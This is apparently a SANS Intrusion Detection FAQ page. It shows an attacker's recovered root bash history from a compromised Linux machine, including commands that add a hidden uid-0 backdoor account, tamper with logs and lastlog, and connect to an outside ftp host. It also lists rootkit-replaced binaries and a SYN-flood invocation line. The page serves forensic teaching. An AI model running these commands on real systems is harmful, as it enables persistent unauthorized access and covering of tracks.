Intrusion Detection FAQ: Is it really important to make sure the root account has a history file?

Yes! Many times this is one of the most important sources of information about a compromise or potential compromise. Consider the following forensic work submitted by David Rust.

On November 12-13th, a machine running SuSE 5.1 Linux 2.0.33 under our control was compromised, inundating our local network with traffic.

Once the machine was restored to our control, we discovered the system log files were erased, but several files were left behind, one of which was a .bash_history in the root directory.

BASH_HISTORY (verbatim)

/usr/sbin/useradd -d /home/skrilla -m -s /bin/bash skrilla

/usr/sbin/useradd -u 0 -o -g 0 -G 0 -d /home/skrilla -s /bin/bash rewt

passwd skrilla

passwd rewt

cat /etc/hosts.deny

cat /etc/hosts.allow

ftp 158.252.134.246

su skrilla

pico /etc/passwd

cd /var/log

ls

grep "sdn" *

id

clear

ls

pico lastlog

who

su rewt

The `grep "sdn" *` command appears to search for evidence of the attacker's address. Fortunately, he left it behind with the ftp command.

In addition to that, several programs were replaced with altered versions:

ifconfig
 
ps 

in.rshd
 
psdevtab

chfn 

inetd 

netstat

chsh 

killall 

passwd 

syslogd

du 

login 

tcpd

find

ls 

top

Of course, passwd and shadow were attacked, effectively locking administrators out of the machine.

In addition to the above modified binaries, we found two additional files:
synk and synk4. synk contained 36 lines: ./synk4 0 $1 0 65535 >/dev/null &

< Previous Question | Back to Intrusion Detection FAQ Home | Next Question >

top^

Check Them Out!

SANS provides the most exhaustive, comprehensive security source available. Bring your hardhat, you're going to work!
-Richard Williams, Symark Software

Intrusion Detection FAQ: Is it really important to make sure the root account has a history file?

BASH_HISTORY (verbatim)

Check Them Out!

Latest Whitepapers

Latest Tweets

Contact Us